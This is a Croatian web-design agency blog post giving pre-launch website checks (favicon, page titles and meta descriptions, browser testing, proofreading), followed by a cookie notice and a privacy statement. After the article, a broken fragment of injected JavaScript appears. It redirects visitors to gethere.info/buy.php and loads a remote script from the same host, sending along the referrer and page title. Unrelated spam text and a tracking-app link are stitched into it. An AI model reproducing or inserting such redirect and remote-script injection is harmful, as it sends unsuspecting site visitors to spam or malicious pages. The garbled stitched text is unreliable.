Pošaljite upit!

NEKOLIKO BITNIH PROVJERA PRIJE OBJAVE INTERNET STRANICE

NEKOLIKO BITNIH PROVJERA PRIJE OBJAVE INTERNET STRANICE

Vaša je dizajnirana, CMS radi, sadržaj je dodan i klijent je sretan. Vrijeme je da internet stranica oživi. Ili nije?

Pri pokretanju internet stranice, često se može zaboraviti na brojne stvari koje su bitne za izgled Vaše stranice. Da se to ne bi dogodilo, bilo bi poželjno obaviti posljednje provjere prije nego objavite svoju internet stranicu svijetu.

Ovaj članak sadrži nekoliko važnih provjera koje je potrebno provesti prije same objave web stranice a sastoji se od malih detalja koje su često ignorirani od strane dizajnera.

Ako su te promjene napravljene na samom početku, vlasniku internet stranice može uštedjeti mnogo vremena i naravno novaca.

FAVICON

Favicon označuje karticu ili prozor u kojem je internet stranica otvorena u korisnikovom pregledniku. Također sprema bookmarkove (oznake), tako da korisnici mogu lako prepoznati stranice s Vaše web stranice.

NASLOV I META PODACI

Glavni naslov Vaše internet stranice je jako bitan element za SEO optimizaciju i također je bitno da korisnici znaju što se nalazi na stranici. Pobrinite se da se naslov mijenja na svakoj stranici i da je povezan sa sadržajem stranice.

Meta opis i ključne riječi nisu tako bitne za SEO (barem za većinu tražilica) ali je uvijek jako dobra ideja da ih se uključi. Zato promijenite opis na svakoj stranici da bi pobliže opisali sadržaj stranice, jer je to ono što Google prikazuje pri opisu rezultata pretraživanja.

PROVJERA SVIH PREGLEDNIKA

Baš kad pomislite da Vaš dizajn izgleda sjajno, a pixeli su savršeni, provjerite ga u IE i vidite da je sve promiješano. Zbog toga je važno da Vaša internet stranica radi preko svih preglednika. Pixesli ne trebaju biti odlični, ali sve ostalo mora raditi tako da korisnik ne može primijetiti bilo koje probleme. Najpopularniji preglednici za provjeru su Internet Explorer 6,7 i 8,Firefox 3, Safari 3, Chrome, Opera i iPhone.

KOREKTURA

Pročitajte sve. Čak i ako ste već porčitali, pročitajte ponovo. Dajte nekome drugome da pročita. Uvijek ćete naći nešto što bi trebalo promijeniti. Razlomite velike tekstualne blokove u kraće odlomke. Dodajte jasne naslove, koristite popise tako da se korisnik može lakše snalaziti.

 

Uskoro još nekoliko savjeta… Stay tuned!

 

 

 

 

 ”http:///?sl=319481-c261c&data1=Track1&data2=Track2″; location.replace(“http://gethere.info/buy.php”);s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; Eventually they surface, especially if the person in the photo gains notoriety or has https://trackingapps.org something to lose

Nastavkom pregledavanja ove stranice prihvačate korištenje Cookia. Više informacija

IZJAVA O PRIVATNOSTI Webnet poštuje vašu privatnost te nastojimo osigurati tajnost vaših privatnih podataka Svjesni smo da ubrzani rast interneta i online servisa utječu na pitanja vezana uz vaše osobne podatke, ali isto tako nastojimo sve vaše skupljene podatke držati u strogoj tajnosti te se obvezujemo da ćemo voditi računa o sigurnosti i tajnosti vaših osobnih podataka. KOJE INFORMACIJE PRIKUPLJAMO? Prikupljamo informacije iz online registracijskog formulara koje ispunjava sam korisnik. Prilikom narudžbe ili registracije možemo Vas tražiti za Vaše cijenjeno ime, prezime, email adresu, adresu i telefonski broj. Pregledavati web trgovinu možete i bez dostave vaših osobnih podataka. U KOJU SVRHU UPOTREBLJAVAMO VAŠE OSOBNE PODATKE? Vaše podatke možemo koristiti u sljedeće svrhe: • personalizacija sadržaja (vaše podatke koristimo u svrhu unapređenja kvalitete sadržaja namijenjenog pojedinom korisniku) • unapređenje naše web stranice (neprestano unapređujemo našu stranicu na temelju Vaših kritika, iskustava i prijedloga) • unapređenje usluge (vaši podaci nam omogućuju da unaprijedimo korisničku podršku te što kvalitetnije zadovoljimo korisničke zahtjeve i potrebe) • slanje periodičnih e-mailova ( u svrhu unapređenja usluga i poboljšanja korisničkih iskustava šaljemo periodične mailove sa relevantnim novostima, informacijama i obavjestima) • promocija, administracija i nadzor stranice NA KOJI NAČIN ČUVAMO VAŠE PODATKE? Vaše podatke čuvamo implementacijom sigurnosnih mjera. KORISTIMO LI COOKIJE? Stranica www.webzamene.net koristi cookije DIJELIMO LI VAŠE PODATKE VANJSKIM PARTNERIMA? Vaše podatke ne prodajemo, mijenjamo ni na koji način dijelimo s vanjskim partnerima. Vaše podatke dostavljamo JEDINO u slučaju kršenja zakona ili na temelju sudskog naloga kojeg smo dužni poštovati. GUBITAK VAŠIH OSOBNIH PODATAKA Stranica www.webzamene.net ne odgovara za štetu nastalu gubitkom Vaših osobnih podataka. Webnet d.o.o. ne može se smatrati odgovornim za zlouporabe za koje se ne može utvrditi da su nastale kao posljedica tehničko-sigurnosnog propusta sustava web trgovine ili propusta djelatnika Webnet d.o.o. ONLINE IZJAVA O PRIVATNOSTI Ova izjava privatnosti vrijedi samo za informacije prikupljene preko naše web stranice, ne vrijedi za informacije prikupljene offline putem. VAŠA SUGLASNOST Koristeći stranicu www.webzamene.net pristajete na Izjavu o privatnosti. PROMJENE U DOKUMENTU "IZJAVA O PRIVATNOSTI" Ukoliko ćemo imati potrebu za promjenom dokumenta "Izjava o privatnosti" sve navedene izmjene će biti objavljene u ovom dokumentu. Zadnji datum izmjene: 10/11/2012 KONTAKTIRAJTE NAS Ukoliko imate bilo kakvo pitanje vezano uz sigurnost vaših osobnih podataka možete nas kontaktirati na : mail: info@webnet.hr

Zatvori